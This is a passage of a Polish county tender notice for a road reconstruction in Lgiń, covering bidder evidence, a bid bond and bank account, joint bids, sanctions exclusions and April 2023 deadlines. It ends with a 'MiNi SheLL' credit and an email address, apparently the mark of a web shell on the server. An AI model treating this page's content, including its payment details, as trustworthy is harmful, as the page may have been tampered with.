obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni<br/>spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w<br/>budownictwie, określone w art. 12 ust. 1 tejże ustawy, mogą również wykonywać osoby, których odpowiednie kwalifikacje<br/>zawodowe zostały uznane na zasadach określonych w przepisach ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U.2021 r. poz. 1646, ze zm.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1<br/>ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków<br/>dowodowych na potwierdzenie niepodlegania wykluczeniu :1) Oświadczenie Wykonawcy, w zakresie art. 108 ust.1. pkt 5 ustawy, o<br/>braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz.U. z 2019 r. poz.369), z innymi Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 10 do SWZ. Wykonawca nie jest zobowiązany do złożenia<br/>podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich<br/>prawidłowość i aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie<br/>z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: a) Wykaz robót budowlanych<br/>wykonanych nie wcześniej niż w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te<br/>zostały wykonane – wg wzoru załącznika nr 7 do SWZ wraz z załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i<br/>prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie<br/>jest w stanie uzyskać tych dokumentów – inne dokumenty. b) Wykaz opracowań projektowych wykonanych nie wcześniej niż w<br/>okresie ostatnich<br/>3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których opracowania te zostały wykonane, z załączeniem<br/>dowodów określających czy te opracowania zostały wykonane należycie, w szczególności informacji o tym czy zostały wykonane<br/>zgodnie z przepisami prawa i prawidłowo ukończone; Wzór wykazu stanowi załącznik nr 8 do SWZ. Dowodami, o których mowa<br/>powyżej, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego opracowania były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. c)<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę, jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z załącznikiem nr 9 do<br/>SWZ. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wymaga w treści załącznika nr 3 do SWZ oświadczenia, że Wykonawca nie podlega wykluczeniu na<br/>podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 10 000,00 zł (słownie: dziesięć tysięcy złotych<br/>00/100) 2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu<br/>związania<br/>ofertą. 3. Wadium może być wniesione w formach określonych w art. 97 ust.7 ustawy Pzp. 4. Jeżeli wadium jest wnoszone<br/>wi<br/>nnej formie niż w pieniądzu Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej. 5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego nr: 34 8669<br/>0001 2011 0003 8380 0007 z dopiskiem: „Wadium - Przebudowa i rozbudowa drogi powiatowej nr 1013F w Lginiu – Etap II”<br/>6. Potwierdzenie wpłaty należy załączyć do oferty. 7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o<br/>których mowa w art. 97 ust. 7 pkt 2) - 4) ustawy Pzp Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub<br/>poręczenia w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym przez gwaranta. 8. Wadium<br/>wniesione w formie gwarancji i poręczeń musi spełniać co najmniej poniższe warunki: 1) musi obejmować odpowiedzialność<br/>za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp; 2) z jego treści<br/>powinno jednoznacznie wynikać zobowiązanie gwaranta; 3) powinno być nieodwołalne i bezwarunkowe oraz płatne na<br/>pierwsze żądanie; 4) musi obejmować cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania<br/>ofert; 5) nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu<br/>gwarancyjnego do Gwaranta; 6) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania; 7) Beneficjentem poręczenia lub gwarancji jest: Powiat Wschowski adres siedziby: 67-400 Wschowa, ul. Plac<br/>Kosynierów 1c, NIP: 925-18-88-370; 9. Zamawiający dokona zwrotu wadium na zasadach określonych w<br/>art. 98 ust. 1 - 5 ustawy Pzp. 10. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami<br/>wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia<br/>rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 11. Wadium<br/>wraz z odsetkami wniesione w pieniądzu przez Wykonawcę, którego oferta została uznana za najkorzystniejszą, na wniosek<br/>tego Wykonawcy, zaliczane jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy. 12.<br/>Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy: 1)<br/>odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 2) nie wniósł<br/>wymaganego zabezpieczenia należytego wykonania umowy, 3) zawarcie umowy stało się niemożliwe z przyczyn leżących<br/>po stronie Wykonawcy, którego oferta została wybrana. 13. Zamawiający zatrzymuje wadium wraz z odsetkami, a w<br/>przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2) - 4) ustawy Pzp,<br/>występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli Wykonawca w odpowiedzi na<br/>wezwanie, o którym mowa w art. 128 ust. 1 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych<br/>środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 ustawy Pzp, oświadczenia, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której<br/>mowa w art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako<br/>najkorzystniejszej. 14. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy lub nie<br/>utrzyma wadium nie przerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o<br/>którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie odrzucona. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty. W przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, oświadczenia o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu<br/>(załącznik nr 3 od SWZ), składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (w tym spółka cywilna) do oferty<br/>należy dołączyć dodatkowo: a) pełnomocnictwo dla pełnomocnika do reprezentowania Wykonawców występujących<br/>wspólnie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i do zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo musi jednoznacznie wynikać z umowy lub z innej czynności prawnej, mieć formę<br/>zgodną z określoną w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania<br/>i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.z 2020 r., poz. 2452), musi w swej<br/>treści zawierać wskazanie niniejszego postępowania. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają ww. pełnomocnictwo lub umowę regulującą współpracę konsorcjum, z której wynika ustanowione pełnomocnictwo. Spółka cywilna dołącza ww. pełnomocnictwo lub dokument, z którego wynika ww. pełnomocnictwo. b)<br/>Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, z którego wynika, które usługi/roboty budowlane wykonają<br/>poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 6 do SWZ. Oświadczenia i dokumenty potwierdzające<br/>brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Formularz oferty podpisuje pełnomocnik Wykonawców wspólnie ubiegających się udzielnie zamówienia lub wszyscy<br/>Wykonawcy. Na pierwszej stronie formularza oferty należy wpisać informacje dotyczące wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za<br/>niewykonanie lub nienależyte wykonanie zamówienia. Oferta podpisana przez pełnomocnika musi być prawnie wiążąca,<br/>łącznie i z osobna dla wszystkich podmiotów składających ofertę. Realizacja całości kontraktu łącznie z płatnościami będzie<br/>dokonywana wyłącznie przez pełnomocnika reprezentującego podmioty występujące wspólnie. Wszystkie podmioty<br/>składające wspólną ofertę będą odpowiedzialne na zasadach określonych w Kodeksie cywilnym. Przed podpisaniem umowy<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru ich oferty jako najkorzystniejszej)<br/>przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy zgodnie z zapisami projektu umowy, stanowiącego załącznik nr 11 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiatwschowa.ezamawiajacy.pl/pn/powiatwschowa/demand/107603/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-19 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-18</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835), zwana dalej<br/>„ustawą sankcyjną” Z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy<br/>z dnia 11 września 2019 r. - Prawo zamówień publicznych wyklucza się: 1) wykonawcę oraz uczestnika konkursu<br/>wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy<br/>sankcyjnej; 2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia<br/>1marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest<br/>osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę<br/>lub<br/>będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w<br/>sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej; 3)<br/>wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej. 2. W celu potwierdzenia braku<br/>istnienia okoliczności, o których mowa w pkt 1 Zamawiający zastrzega możliwość samodzielnego badania<br/>ogólnodostępnych rejestrów, w tym Centralnej Ewidencji i Informacji o Działalności Gospodarczej, Krajowego Rejestru<br/>Sądowego oraz Centralnego Rejestru Beneficjentów Rzeczywistych. W uzasadnionych przypadkach Zamawiający będzie<br/>żądał innych koniecznych dokumentów i oświadczeń, w szczególności poświadczonego przez wykonawcę za zgodność z<br/>oryginałem wyciągu z księgi udziałów (art. 188 KSH) lub rejestru akcji (art. 328(1)* KSH). 3. W celu potwierdzenia istnienia<br/>okoliczności, o których mowa w pkt 1 Wykonawcy zagraniczni będą zobowiązani do przedkładania dokumentów z odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku takiego rejestru, inny równoważny dokument<br/>wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania wraz z tłumaczeniem na język polski. Zdanie 2 pkt 2 stosuje się odpowiednio. 4. Oferta wykonawcy, o którym<br/>mowa w pkt 1 zostanie odrzucona.

Creat By MiNi SheLL
Email: jattceo@gmail.com